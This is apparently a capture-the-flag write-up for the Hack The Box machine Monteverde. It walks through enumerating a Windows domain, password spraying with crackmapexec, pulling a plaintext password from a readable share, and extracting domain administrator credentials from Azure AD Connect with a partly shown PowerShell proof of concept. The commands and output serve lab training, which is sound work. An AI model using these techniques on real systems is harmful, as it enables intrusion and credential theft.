HTB - Monteverde

Machine Info

Monteverde is a Medium Windows machine that features Azure AD Connect. The domain is enumerated and a user list is created. Through password spraying, the SABatchJobs service account is found to have the username as a password. Using this service account, it is possible to enumerate SMB Shares on the system, and the $users share is found to be world-readable. An XML file used for an Azure AD account is found within a user folder and contains a password. Due to password reuse, we can connect to the domain controller as mhope using WinRM. Enumeration shows that Azure AD Connect is installed. It is possible to extract the credentials for the account that replicates the directory changes to Azure (in this case the default domain administrator).

Enumeration

---

Scope

IP Address: 10.10.10.172

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack
88/tcp   open  kerberos-sec     syn-ack
135/tcp  open  msrpc            syn-ack
139/tcp  open  netbios-ssn      syn-ack
389/tcp  open  ldap             syn-ack
445/tcp  open  microsoft-ds     syn-ack
464/tcp  open  kpasswd5         syn-ack
636/tcp  open  ldapssl          syn-ack
3269/tcp open  globalcatLDAPssl syn-ack
5985/tcp open   wsman           syn-ack                                                                      
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap        

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-10 14:21:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  tcpwrapped
3269/tcp open  tcpwrapped
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-07-10T14:21:46
|_  start_date: N/A
|_clock-skew: 5s

* Open ports: 53,88,135,139,389,445,464,636,3269
* UDP Open ports: 53,88,123,389
* Services: DNS - KERBEROS - RPC - SMB - LDAP - NTP - winRM
* Important Notes: Domain: MEGABANK.LOCAL 

DNS Enumeration

No zone transfer

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ dig axfr MEGABANK.LOCAL @$ip                    

; <<>> DiG 9.19.19-1-Debian <<>> axfr MEGABANK.LOCAL @10.10.10.172
;; global options: +cmd
; Transfer failed.

RPC Enumeration

Got a list of usernames from rpcclient, then filter and add the output to a list

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ cat users.test | cut -d\[ -f2 | cut -d\] -f1  | tee -a users.lst
Guest
AAD_987d7f2f57d2
SABatchJobs
svc-ata
svc-bexec
svc-netapp
mhope
dgalanos
roleary
smorgan

SMB Enumeration

No thing found after trying enumerating smb

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ crackmapexec smb $ip -u ''  -p '' --shares                                  

SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\: 
SMB         10.10.10.172    445    MONTEVERDE       [-] Error enumerating shares: STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ smbclient -N -L //$ip                            
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

KERBEROS Enumeration

I attempted ASREP-Roasting attack but failed

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ impacket-GetNPUsers megabank.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set

Initial Access

---

After I run all options I know, I tried password spraying with the name usernames as passwords

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ crackmapexec smb $ip -u users.lst -p users.lst --no-bruteforce --continue-on-success

<snip>
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
<snip>

List the shares on the box and permissions we have on each one with crackmapexec and list the content of available share with spider_plus module

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ crackmapexec smb $ip -u SABatchJobs -p SABatchJobs --shares

SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB         10.10.10.172    445    MONTEVERDE       [+] Enumerated shares
SMB         10.10.10.172    445    MONTEVERDE       Share           Permissions     Remark
SMB         10.10.10.172    445    MONTEVERDE       -----           -----------     ------
SMB         10.10.10.172    445    MONTEVERDE       ADMIN$                          Remote Admin
SMB         10.10.10.172    445    MONTEVERDE       azure_uploads   READ            
SMB         10.10.10.172    445    MONTEVERDE       C$                              Default share
SMB         10.10.10.172    445    MONTEVERDE       E$                              Default share
SMB         10.10.10.172    445    MONTEVERDE       IPC$            READ            Remote IPC
SMB         10.10.10.172    445    MONTEVERDE       NETLOGON        READ            Logon server share 
SMB         10.10.10.172    445    MONTEVERDE       SYSVOL          READ            Logon server share 
SMB         10.10.10.172    445    MONTEVERDE       users$          READ  

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ crackmapexec smb $ip -u SABatchJobs -p SABatchJobs --shares -M splider_plus

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ cat /tmp/cme_spider_plus/10.10.10.172.json

<SNIP>
    "azure_uploads": {},                                   
    "users$": {                                            
        "mhope/azure.xml": {                               
            "atime_epoch": "2020-01-03 08:41:18",                                                                     
            "ctime_epoch": "2020-01-03 08:39:53",                                                                     
            "mtime_epoch": "2020-01-03 09:59:24",                                                                     
            "size": "1.18 KB"

Download that Interesting file

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ smbclient -U SABatchJobs \\\\$ip\\users$       
Password for [WORKGROUP\SABatchJobs]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jan  3 08:12:48 2020
  ..                                  D        0  Fri Jan  3 08:12:48 2020
  dgalanos                            D        0  Fri Jan  3 08:12:30 2020
  mhope                               D        0  Fri Jan  3 08:41:18 2020
  roleary                             D        0  Fri Jan  3 08:10:30 2020
  smorgan                             D        0  Fri Jan  3 08:10:24 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \> cd mhope
smb: \mhope\> ls
  .                                   D        0  Fri Jan  3 08:41:18 2020
  ..                                  D        0  Fri Jan  3 08:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 08:40:23 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (3.4 KiloBytes/sec) (average 3.4 KiloBytes/sec)

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ cat azure.xml  

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>   

I found a password 4n0therD4y@n0th3r$ and I give it a try of the usernames list I have

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ crackmapexec smb $ip -u users.lst -p '4n0therD4y@n0th3r$' --continue-on-success

<snip>
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ 
<snip>

We got a valid credential, Let's see if we have remote access to the box

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ crackmapexec winrm $ip -u mhope -p '4n0therD4y@n0th3r$' 

WINRM       10.10.10.172    5985   MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)

Yes. we have :)

*Evil-WinRM* PS C:\Users\mhope> type Desktop\user.txt
91d393fd513501e700cxxxxxxxxxxxxx

User Flag: 91d393fd513501e700cxxxxxxxxxxxxx

---

Privilege Escalation

Useful Post: Azure AD Connect for Red Teamers - XPN InfoSec Blog (xpnsec.com)

@_xpn_ - Azure AD Connect for Red TeamersXPN InfoSec Blog

• Modify the connection string line with the following argument:

  • Server=127.0.0.1

  • Database=DCSync

  • Integrated Security=True

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ nano azure_decrypt_password.ps1

Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"

$client = New-Object System.Data.SqlClient.SqlConnection -ArgumentList "Server=127.0.0.1;DataBase=ADSync;Integrated Security=True"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
<snip>

*Evil-WinRM* PS C:\Users\mhope\Documents> .\azure_decrypt_password.ps1
AD Connect Sync Credential Extract POC (@_xpn_)

Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dmxxxxxxxxxx

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]                                 
└─$ evil-winrm -i $ip -u 'administrator' -p 'd0m@in4dmxxxxxxxxx'


*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
bb3e0436d4588c2baxxxxxxxxxxxxx

Root Flag: bb3e0436d4588c2baxxxxxxxxxxxxx